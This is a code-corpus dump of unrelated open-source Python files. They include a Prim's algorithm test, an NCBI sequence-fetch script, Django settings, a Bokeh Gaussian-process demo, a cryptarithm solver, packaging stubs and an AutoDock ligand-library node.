a11e3bfc48930fad0830280da37c6ef706d754a2 | 778f80d2c449ea49596624607dc9ccb25aebc758 | /cap7/TestaAgmPrim.py | 43d5053d974ddd1d1e0ed7f27bdcc0d69b10e007 | [] | no_license | ProFL/TADGrafo_Python | aa7e46e31254643f1363c611cbe5c18c079bf09b | c018e886b2582b876cc97558a79fd92b083559d2 | refs/heads/master | 2021-08-23T18:20:46.861034 | 2017-12-06T01:48:17 | 2017-12-06T01:48:17 | 112,876,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 843 | py | ''' Módulo para testar o algoritmo de Primm '''
import sys
import os
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + "/listaadj/autoreferencia")
from EntradaDeGrafo import EntradaDeGrafo
from Grafo import Grafo
from AgmPrim import AgmPrim
#pylint: disable=C0103
# Root vertex for the MST (interactive prompt left disabled below).
raiz = 2#int(input("Raiz da AGM:"))
# grafo = EntradaDeGrafo.digitarGrafo()
# Build a 6-vertex weighted graph from the edge list [v1, v2, weight].
grafo = Grafo(6)
arestas = [[0, 1, 6],
           [0, 2, 100],
           [0, 3, 5],
           [1, 2, 2],
           [1, 4, 5],
           [2, 3, 2],
           [2, 4, 6],
           [2, 5, 4],
           [3, 5, 3],
           [4, 5, 4]]
for aresta in arestas:
    a = EntradaDeGrafo.converteAresta(aresta[0], aresta[1], aresta[2])
    EntradaDeGrafo.insereArestaS(grafo, a.v1, a.v2, a.peso)
grafo.imprime()
# Run Prim's algorithm from the chosen root and print the resulting MST.
agm = AgmPrim(grafo)
agm.obterAgm(raiz)
agm.imprime()
#pylint: enable=C0103
| [
"pedro-fiuza10@hotmail.com"
] | pedro-fiuza10@hotmail.com |
320129562399e4ff93138bb8e0fc870add4138a7 | 423dc2cbdbb099d8b1031886fd64f1680cf06ccc | /src/ej5.py | ce4af8915ecd53b15d68712ae43bd0924204ca02 | [] | no_license | javicorvi/python_examples | 793b03dfbf275d14d12be51373f37dd98ebf44dd | 2292619d13445a051bd951a933b9d9e30d690923 | refs/heads/master | 2021-06-09T21:31:25.922912 | 2017-01-02T18:35:45 | 2017-01-02T18:35:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,936 | py | # ---------------------------------------------------------------------------- #
# coding=utf-8
# ---------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------- #
# imports
import httplib, urllib
import xml.etree.ElementTree as ET
# ---------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------- #
# Create the connection to the NCBI E-utilities service (Python 2 script).
#conn = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
# Alternative GET form of the query:
#conn.request("GET", "/entrez/eutils/esearch.fcgi?db=Nuccore&term=HUMAN")
# ESearch: nucleotide records for Junin virus, up to 1000 ids.
params = urllib.urlencode({'db': 'nuccore','term':'Junin+Virus[orgn]','retmax':1000})
conn = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
conn.request("POST", "/entrez/eutils/esearch.fcgi", params )
# ---------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------- #
# Get the response.
r1 = conn.getresponse()
# Check that the response is OK.
if not r1.status == 200 :
    # NOTE(review): r1.status is an int, so this concatenation would raise
    # TypeError if this branch is ever reached.
    print "Error en la conexión: " + r1.status + " " + r1.reason
    exit()
# Read the response body (ESearch XML).
response = r1.read()
print response
docXml = ET.fromstring(response)
# For every returned id: EFetch the nuccore record, extract its PubMed id,
# then EFetch the PubMed abstract.
for f in docXml.find("IdList").findall("Id") :
    print "ID {:15} ".format(f.text)
    params = urllib.urlencode({'db':'nuccore','retmode':'xml','id':f.text})
    conn2 = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
    conn2.request("POST", "/entrez/eutils/efetch.fcgi", params )
    rf = conn2.getresponse()
    if not rf.status == 200 :
        print "Error en la conexión: " + rf.status + " " + rf.reason
        exit()
    response_efetch = rf.read()
    print response_efetch
    docXml_f = ET.fromstring(response_efetch)
    pubMed = docXml_f.find("GBSeq/GBSeq_references/GBReference/GBReference_pubmed").text
    print pubMed
    params = urllib.urlencode({'db':'pubmed','rettype':'abstract','retmode':'txt','id':pubMed})
    conn3 = httplib.HTTPSConnection("eutils.ncbi.nlm.nih.gov")
    conn3.request("POST", "/entrez/eutils/efetch.fcgi", params )
    rpub = conn3.getresponse()
    if not rpub.status == 200 :
        print "Error en la conexión: " + rpub.status + " " + rpub.reason
        exit()
    response_pubmed = rpub.read()
    print response_pubmed
    # NOTE(review): rpub.close and rf.close below lack parentheses, so the
    # methods are referenced but never called.
    rpub.close
    conn3.close()
    rf.close
    conn2.close()
# Save the ESearch XML to disk.
save_file = open("my_junin_virus.xml", "w")
save_file.write(response)
save_file.close()
# NOTE(review): r1.close lacks parentheses (never called).
r1.close
# Close the connection.
conn.close()
#print docXml.find("Count").text
# End of the query.
#print "{:15} {:45} {:10} ".format(docXml.find("eSearchResult/Count").text, docXml.find("eSearchResult/From").text, docXml.find("eSearchResult/To").text)
| [
"javicorvi@gmail.com"
] | javicorvi@gmail.com |
dba9826fd017a5155e4aeb88ce6828001cac6adb | f4a4c9a68a4ead50c0882832f3f73b9cb29271f6 | /backend/cardgameapp_22189/settings.py | 5d1e2e15e8ab4ff8efd7b0549a39e0e1e23558cb | [] | no_license | crowdbotics-apps/cardgameapp-22189 | 276e0c18661a3e1ae474f2deb11b6fc32b66eb38 | 200ca6880781d3d832be39f44b8aa290db481ec2 | refs/heads/master | 2023-01-11T11:45:35.488695 | 2020-11-01T17:50:20 | 2020-11-01T17:50:20 | 309,153,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,111 | py | """
Django settings for cardgameapp_22189 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
# Environment reader: all deploy-specific values come from env vars.
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "django.contrib.sites",
    "course",
]
LOCAL_APPS = [
    "home",
    "users.apps.UsersConfig",
]
THIRD_PARTY_APPS = [
    "rest_framework",
    "rest_framework.authtoken",
    "rest_auth",
    "rest_auth.registration",
    "bootstrap4",
    "allauth",
    "allauth.account",
    "allauth.socialaccount",
    "allauth.socialaccount.providers.google",
    "django_extensions",
    "drf_yasg",
    # start fcm_django push notifications
    "fcm_django",
    # end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "cardgameapp_22189.urls"
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ],
        },
    },
]
WSGI_APPLICATION = "cardgameapp_22189.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# SQLite by default; overridden by DATABASE_URL when provided.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.sqlite3",
        "NAME": os.path.join(BASE_DIR, "db.sqlite3"),
    }
}
if env.str("DATABASE_URL", default=None):
    DATABASES = {"default": env.db()}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
# WhiteNoise serves static files directly from the app process.
MIDDLEWARE += ["whitenoise.middleware.WhiteNoiseMiddleware"]
AUTHENTICATION_BACKENDS = (
    "django.contrib.auth.backends.ModelBackend",
    "allauth.account.auth_backends.AuthenticationBackend",
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, "static")]
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
    # Replace password reset serializer to fix 500 error
    "PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
    # Use custom serializer that has no username and matches web signup
    "REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
# Email via SendGrid SMTP; credentials come from the environment.
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
    "DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
    # output email to console instead of sending
    if not DEBUG:
        logging.warning(
            "You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails."
        )
    EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
17584929153323757012d9c8a5981b6d6497d4ad | ef46379a8f1576bc6a0bb21c46126a1ce404f029 | /105thick/makerandom.py | a733fe42bc8e5bda636c554618c5c48e33db3764 | [] | no_license | xiaodongli1986/LSS_xis | 534baa2bd4405799d77d95374e1ae9e0d4ae64ae | 60d4d171654625ad359c24bda97d37f588b36a9d | refs/heads/master | 2020-04-12T06:40:38.405152 | 2017-04-29T07:59:01 | 2017-04-29T07:59:01 | 63,673,203 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py |
import random

# Number of random (x, y) points to generate.
nran = 15028085*30
# Context manager guarantees the file is closed even if generation fails
# partway (the original left the handle open on any exception).
with open('random.xyzw', 'w') as nowf:
    for i in range(nran):
        x,y = random.uniform(0,3150), random.uniform(0,3150)
        # Columns: x y z(=0) weight(=1), matching the .xyzw format.
        nowf.write(str(x)+' '+str(y)+' 0 1\n')
| [
"xiaodongli@kias.re.kr"
] | xiaodongli@kias.re.kr |
e6ff826e900d179f149b994ff4de5462b627cff7 | 7211f6e8b854175e6d2c29fe364f6eac224b2f56 | /gpapp2.py | 8d9210f4b96a4c79073bc0fe3c3c8d8b8687f170 | [] | no_license | jimparr19/gaussianprocess.python | c340572801717d76c56888338f9fda5fbd8d83c1 | a2d0a38412691d85c42504330f68d3f88e38510a | refs/heads/master | 2020-04-06T07:11:30.282345 | 2016-09-14T22:07:18 | 2016-09-14T22:07:18 | 63,553,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,955 | py | import numpy as np
from bokeh.models import ColumnDataSource, TapTool, Circle
from bokeh.plotting import figure, curdoc
from bokeh.models.widgets import Slider
from bokeh.layouts import row, widgetbox
# Plot domain for the interactive Gaussian-process demo.
min_x = -3
max_x = 3
min_y = -5
max_y = 5
# Kernel hyperparameter sliders: length scale, exponent, and a diagonal
# "regression" (noise/jitter) term added to the training covariance.
length_scale = Slider(title="length_scale", value=1.0, start=0.01, end=2.0, step=0.01)
power = Slider(title="power", value=2.0, start=1.0, end=3.0, step=0.1)
regression = Slider(title="regression", value=0.0, start=0.0, end=0.1, step=0.001)
l = length_scale.value
p_l = power.value
r = regression.value
# Invisible 100x100 grid of tappable points covering the plot area.
xi = np.linspace(min_x, max_x, 100)
yi = np.linspace(min_y, max_y, 100)
xv, yv = np.meshgrid(xi, yi)
x_grid = xv.flatten()
y_grid = yv.flatten()
# Test locations where the GP mean/band are evaluated.
n = 50
x = np.linspace(min_x, max_x, n)
mu = np.zeros(n)
# Prior covariance: k(xi, xj) = exp(-0.5 * (|xi - xj| / l) ** p_l).
sigma_test = np.zeros((n,n))
for i in range(len(x)):
    for j in range(len(x)):
        sigma_test[i,j] = np.exp(-0.5 * (np.abs(x[i] - x[j])/l) ** p_l)
#sigma_test = sigma_test + r*np.eye(n)
# NOTE(review): err is the covariance diagonal (a variance), yet it is used
# directly in the +/-1.95 band as if it were a standard deviation -- confirm.
err = sigma_test.diagonal()
upper_limit = mu + 1.95*err
lower_limit = mu - 1.95*err
# Patch outline: x forward then reversed, lower band then upper reversed.
band_x = np.append(x, x[::-1]).tolist()
band_y = np.append(lower_limit, upper_limit[::-1]).tolist()
TOOLS="reset"
# create the scatter plot
p = figure(tools=TOOLS, plot_width=800, plot_height=600, min_border=10, min_border_left=50,
           toolbar_location="above", title="GP updates")
p.background_fill_color = "#fafafa"
# s1: tappable grid; s2: user-placed observations; s3: GP mean + band.
s1 = ColumnDataSource(data = dict(x=x_grid, y=y_grid))
s2 = ColumnDataSource(data = dict(x=[], y=[]))
s3 = ColumnDataSource(data = dict(x=x, y=mu, band_x=band_x, band_y=band_y))
# Invisible circles so taps can be resolved to grid coordinates.
r1 = p.circle(x='x', y='y', source=s1, line_color=None, fill_color=None, size=10, name="mycircle")
selected_circle = Circle(line_color=None, fill_color=None)
nonselected_circle = Circle(line_color=None, fill_color=None)
renderer = p.select(name="mycircle")
renderer.selection_glyph = selected_circle
renderer.nonselection_glyph = nonselected_circle
tap_tool = TapTool(renderers=[r1])
p.tools.append(tap_tool)
# Visible observations, GP mean line, and uncertainty band.
r2 = p.circle(x='x',y='y', source=s2, line_color='#d3d3d3', fill_color='#d3d3d3', size=10)
r3 = p.line(x='x',y='y', source=s3)
p.patch(x='band_x', y='band_y', source=s3, color='#d3d3d3', alpha=0.5)
ds = r2.data_source
gp = r3.data_source
def update_data(attr, old, new):
    """Tap callback: add the tapped grid point as an observation and
    recompute the GP posterior mean and uncertainty band.

    Args follow the Bokeh on_change signature; `new` carries the tap
    selection as new['1d']['indices'].
    """
    # Read current kernel hyperparameters from the sliders.
    l = length_scale.value
    p_l = power.value
    r = regression.value
    # Prior covariance at the test points (same kernel as module setup).
    sigma_test = np.zeros((n, n))
    for i in range(len(x)):
        for j in range(len(x)):
            sigma_test[i, j] = np.exp(-0.5 * (np.abs(x[i] - x[j])/l) ** p_l)
    #sigma_test = sigma_test + r * np.eye(n)
    inds = new['1d']['indices']
    if inds != []:
        # Append the tapped grid coordinate to the observation source.
        new_data = dict()
        new_data['x'] = ds.data['x'] + [x_grid[inds[0]]]
        new_data['y'] = ds.data['y'] + [y_grid[inds[0]]]
        ds.data = new_data
        x_obs = np.array(new_data['x'])
        y_obs = np.array(new_data['y'])
        # K(train, train), regularized with r on the diagonal.
        sigma_train = np.zeros((len(x_obs), len(x_obs)))
        for i in range(len(x_obs)):
            for j in range(len(x_obs)):
                sigma_train[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x_obs[j])/l) ** p_l)
        sigma_train = sigma_train + r * np.eye(len(x_obs))
        # K(train, test) and K(test, train) cross-covariances.
        sigma_train_test = np.zeros((len(x_obs), len(x)))
        for i in range(len(x_obs)):
            for j in range(len(x)):
                sigma_train_test[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x[j])/l) ** p_l)
        sigma_test_train = np.zeros((len(x), len(x_obs)))
        for i in range(len(x)):
            for j in range(len(x_obs)):
                sigma_test_train[i, j] = np.exp(-0.5 * (np.abs(x[i] - x_obs[j])/l) ** p_l)
        # GP posterior: mean = K*s K^-1 y, cov = K** - K*s K^-1 Ks*.
        phi = sigma_test_train.dot(np.linalg.inv(sigma_train))
        pred = phi.dot(y_obs)
        cov = sigma_test - phi.dot(sigma_train_test)
        # NOTE(review): err is a variance diagonal used like a std dev in
        # the +/-1.95 band -- confirm intent (matches the module setup).
        err = cov.diagonal()
        upper_limit = pred + 1.95*err
        lower_limit = pred - 1.95*err
        band_x = np.append(x, x[::-1]).tolist()
        band_y = np.append(lower_limit, upper_limit[::-1]).tolist()
        # Push mean and band back to the GP data source for redraw.
        gp_data = dict()
        gp_data['x'] = x.tolist()
        gp_data['y'] = pred.tolist()
        gp_data['band_x'] = band_x
        gp_data['band_y'] = band_y
        gp.data = gp_data
def update_slider(attr, old, new):
l = length_scale.value
p_l = power.value
r = regression.value
sigma_test = np.zeros((n, n))
for i in range(len(x)):
for j in range(len(x)):
sigma_test[i, j] = np.exp(-0.5 * (np.abs(x[i] - x[j])/l) ** p_l)
#sigma_test = sigma_test + r * np.eye(n)
x_obs = ds.data['x']
y_obs = ds.data['y']
sigma_train = np.zeros((len(x_obs), len(x_obs)))
for i in range(len(x_obs)):
for j in range(len(x_obs)):
sigma_train[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x_obs[j])/l) ** p_l)
sigma_train = sigma_train + r * np.eye(len(x_obs))
sigma_train_test = np.zeros((len(x_obs), len(x)))
for i in range(len(x_obs)):
for j in range(len(x)):
sigma_train_test[i, j] = np.exp(-0.5 * (np.abs(x_obs[i] - x[j])/l) ** p_l)
sigma_test_train = np.zeros((len(x), len(x_obs)))
for i in range(len(x)):
for j in range(len(x_obs)):
sigma_test_train[i, j] = np.exp(-0.5 * (np.abs(x[i] - x_obs[j])/l) ** p_l)
phi = sigma_test_train.dot(np.linalg.inv(sigma_train))
pred = phi.dot(y_obs)
cov = sigma_test - phi.dot(sigma_train_test)
err = cov.diagonal()
upper_limit = pred + 1.95*err
lower_limit = pred - 1.95*err
band_x = np.append(x, x[::-1]).tolist()
band_y = np.append(lower_limit, upper_limit[::-1]).tolist()
gp_data = dict()
gp_data['x'] = x.tolist()
gp_data['y'] = pred.tolist()
gp_data['band_x'] = band_x
gp_data['band_y'] = band_y
gp.data = gp_data
r1.data_source.on_change('selected', update_data)
for w in [length_scale, power, regression]:
w.on_change('value', update_slider)
inputs = widgetbox(length_scale, power, regression)
curdoc().add_root(row(inputs, p, width=1200))
curdoc().title = "Gaussian Process Updates" | [
"jimparr19@gmail.com"
] | jimparr19@gmail.com |
cf025e4e4a83d5bcf74a7018aca2af88294b8cb1 | ec645951ce4a1f7d404ebca438dfff8fb74cc3f4 | /venv/bin/jupyter-troubleshoot | 8f347cbe928d8562e8843ae244df1a6cae1c7e4f | [] | no_license | Josue23/scrapy | 695c0e93e6c1f0c0de5a04bd2eaced3e5520801e | 469cc4cff7d986264c4bcc291e9eb5f5a6256da9 | refs/heads/master | 2021-01-09T06:19:59.794012 | 2017-03-04T00:21:52 | 2017-03-04T00:21:52 | 80,957,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | #!/home/josh/Documentos/labs/scrapy/venv/bin/python3.5
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.troubleshoot import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"josuerodrigues@gmail.com"
] | josuerodrigues@gmail.com | |
69f93da6d453113bd298cb9f66e6defcabfe14f0 | b9d6af8de01ba4c62ead7c1a7125c01e95c768fe | /src/solve.py | ca698f2ca3a736e6577d3341fbe9af225be56984 | [] | no_license | zhiyue-archive/pythontest | eba9cbaefd925527480b28714c2496808c5e3429 | 9d63b6768bae4ea79718d4ce2fdab44ece385897 | refs/heads/master | 2022-05-12T02:30:32.990296 | 2013-04-28T02:12:23 | 2013-04-28T02:12:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | '''
Created on 2011-1-23
@author: hooxin
'''
import re
import itertools
def solve(puzzle):
words=re.findall('[A-Z]+', puzzle.upper())
uniqueCharacters=set(''.join(words))
assert len(uniqueCharacters) <= 10,'Too many letters'
firstLetters={word[0] for word in words}
n=len(firstLetters)
sortedCharecters=''.join(firstLetters)+\
''.join(uniqueCharacters-firstLetters)
characters=tuple(ord(c) for c in sortedCharaters)
digits=tuple(ord(c) for c in '0123456789')
zero=digits[0]
for guess in itertools.permutations(digits,len(characters)):
if zero not in guess[:n]:
equation=puzzle.translation(dict(zip(characters,guess)))
if eval(equation):
return equation
if __name__=='__main__':
import sys
for puzzle in sys.argv[1:]:
print(puzzle)
solution=solve(puzzle)
if solution:
print(solution)
| [
"firefoxmmx@gmail.com"
] | firefoxmmx@gmail.com |
dabbebdf3ba85ca82a00cf07bfab3cfeb37bc538 | b9266409059721d5313ddbe49447a0d21692644a | /setup.py | 5b26493b1ec0650bf0a5f44d1a5c0d7561428489 | [
"BSD-3-Clause"
] | permissive | FrankTN/CoRa | 543661ad09e2299ee1a0a8ee16c80e6bb30d3a45 | 4f1dec44c97c8127a209e041711757696931c750 | refs/heads/development | 2022-12-12T11:22:50.349155 | 2020-08-28T15:09:54 | 2020-08-28T15:09:54 | 266,853,854 | 0 | 0 | BSD-3-Clause | 2020-08-28T15:08:42 | 2020-05-25T18:37:10 | Python | UTF-8 | Python | false | false | 499 | py | import setuptools as st
st.setup(
name='cora',
version='0.1',
author='Frank te Nijenhuis',
packages=st.find_packages(),
description='CLI wrapper for pyradiomics implementing COVID analysis ',
install_requires=[
'setuptools',
'numpy',
'pyradiomics',
'click',
'scipy',
'SimpleITK',
],
python_requires='>=3.6',
entry_points={
'console_scripts': [
'cora = corad.__main__:main',
],
},
)
| [
"franktn15@gmail.com"
] | franktn15@gmail.com |
6aec14c71c1077915f0785c67688532b5d7a8e6b | ed8a4499404adceaa64f9928870b50d7187aab25 | /htmlDecode.py | e9198ca8d8c74423c221722fa66a70f23933559d | [] | no_license | bishalthingom/football-data | b965cbc47ee7b716c58a4c0cedeaf383b9195fb0 | 743aa4d10b0e400c0ef1328f887115d6330068c6 | refs/heads/master | 2021-08-08T04:21:15.441709 | 2017-11-09T15:08:55 | 2017-11-09T15:08:55 | 110,129,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | from HTMLParser import HTMLParser
seasons = open('seasons_info.txt','r')
seasons_op = open('seasons_op.txt','a+')
seasons_dat = seasons.readlines()
h = HTMLParser()
for season in seasons_dat:
seasons_op.write(h.unescape(season))
print h.unescape(season) | [
"bishalthingom@gmail.com"
] | bishalthingom@gmail.com |
5a0abc67dccce75eaf012ecd70bb149b865586c2 | c7e602238e516754f572868eaaba5aa84c3bbe99 | /mle-nanodegree-capstone-project/lib/python3.7/locale.py | 347046fe1f1d4f47667f09b0c76f2f7da5247a86 | [] | no_license | juliatessler/udacity-mle-nanodegree | 24297e8233781c79ed55b1c415af6e64f7a2c324 | a4ec8a5220d06599dfcad2934ffb1684f42664a1 | refs/heads/master | 2023-02-25T22:20:57.252819 | 2022-04-18T19:21:12 | 2022-04-18T19:21:12 | 223,796,916 | 0 | 0 | null | 2023-02-10T23:09:44 | 2019-11-24T19:19:06 | Python | UTF-8 | Python | false | false | 53 | py | /home/julia.tessler/anaconda3/lib/python3.7/locale.py | [
"juliatessler@gmail.com"
] | juliatessler@gmail.com |
a5b6dfea444a57414b37cfd52ed445e223037418 | ee954c46fa7a533369bd8845b41568d89a879d44 | /bleachmd/templatetags/bleachmd.py | 453636c5c7b114bf3a1201c05db336ece6cb7e3b | [] | no_license | sjoerdjob/tillogger | 84538a46dea7c1d59a7ca90645e63f0fb51ffe34 | ad0434f42314b491eaea3820558a6a488d6451be | refs/heads/master | 2021-01-10T03:19:58.289681 | 2016-05-09T16:33:08 | 2016-05-09T16:33:08 | 55,001,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | from __future__ import unicode_literals
from django import template
from django.utils.html import mark_safe
import markdown
import markdown.extensions.headerid # Needs force-importing.
import bleach
register = template.Library()
ALLOWED_TAGS = [
'code',
'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
'li',
'p',
'pre',
'ul',
]
@register.filter
def bleachmd_title(value):
return mark_safe(bleach.clean(
markdown.markdown(
'# {}'.format(value),
[markdown.extensions.headerid.HeaderIdExtension(level=2)],
),
tags=ALLOWED_TAGS,
))
@register.filter
def bleachmd(value):
return mark_safe(bleach.clean(
markdown.markdown(
value,
[markdown.extensions.headerid.HeaderIdExtension(level=3)],
),
tags=ALLOWED_TAGS,
))
| [
"sj.postmus@developers.nl"
] | sj.postmus@developers.nl |
e1286fa2a637e5aa1f0465a38d82e1bd3905c8d1 | 659a7a65c877f2eb0adbb6001a1f85f063d01acd | /mscreen/autodocktools_prepare_py3k/AutoDockTools/VisionInterface/Adt/Input/PublicServerLigandDB.py | 26991dad68bfc2d248eec6fec64dacb18f2d6a6b | [
"MIT"
] | permissive | e-mayo/mscreen | da59771be250ebe341feb102e0cbf41aab70de43 | a50f0b2f7104007c730baa51b4ec65c891008c47 | refs/heads/main | 2023-06-21T17:47:06.519307 | 2021-08-09T16:06:29 | 2021-08-09T16:06:29 | 345,008,321 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,110 | py | #########################################################################
#
# Date: Nov 2001 Authors: Michel Sanner
#
# sanner@scripps.edu
#
# The Scripps Research Institute (TSRI)
# Molecular Graphics Lab
# La Jolla, CA 92037, USA
#
# Copyright: Michel Sanner and TSRI
#
#########################################################################
from NetworkEditor.items import NetworkNode
from AutoDockTools.VisionInterface.Adt.LigandDB import LigandDB
from mglutil.util.packageFilePath import getResourceFolderWithVersion
import os
import time
import urllib.request, urllib.error, urllib.parse
class PublicServerLigandDB(NetworkNode):
"""
List of available public libraries on the virtual screening server.
A description of the ligand libraries can be found on
http://nbcr.sdsc.edu/pub/wiki/index.php?title=Virtual_Screening_Libraries
Input: a public ligand library name
Output: LigandDB object containing info about the info
"""
def __init__(self, name='PublicServerLigandDB', **kw):
import urllib.request, urllib.parse, urllib.error
kw['name'] = name
NetworkNode.__init__(*(self,), **kw)
kw['name'] = name
NetworkNode.__init__(*(self,), **kw)
ip = self.inputPortsDescr
ip.append(datatype='string', name='server_lib', required=True, )
fqdn = "kryptonite.nbcr.net"
url = "http://" + fqdn + "/pub_ligand_libs.txt"
publibdir = os.path.join(getResourceFolderWithVersion(), 'ws')
if not (os.path.exists(publibdir)):
os.mkdir(publibdir)
publiblocal = os.path.join(publibdir, 'publibs.txt')
lock = publiblocal + '.lock'
if os.path.exists(lock) and time.time() - os.path.getmtime(lock) > 15:
os.remove(lock)
try:
if not(os.path.exists(lock)):
open(lock, 'w').close()
publibweb = urllib.request.urlopen(url)
outfile = open(publiblocal, 'w')
outfile.write(publibweb.read())
outfile.close()
os.remove(lock)
except:
print("[INFO]: Getting list of public server libs from cache")
pass
try:
f = open(publiblocal, 'r')
self.choices = f.read().split()
f.close()
except:
self.choices = []
print("[ERROR]: Unable to public server libs from the web and from cache")
self.widgetDescr['server_lib'] = {
'class':'NEComboBox', 'master':'node',
'choices':self.choices,
'fixedChoices':True,
'entryfield_entry_width':18,
'labelGridCfg':{'sticky':'w'},
'widgetGridCfg':{'sticky':'w'},
'labelCfg':{'text':'Server Libraries:'}}
op = self.outputPortsDescr
op.append(datatype='LigandDB', name='ligDB')
code = """def doit(self, server_lib):
ligDB = LigandDB(server_lib=server_lib)
self.outputData(ligDB=ligDB)
"""
self.setFunction(code)
| [
"eduardomayoyanes@gmail.com"
] | eduardomayoyanes@gmail.com |
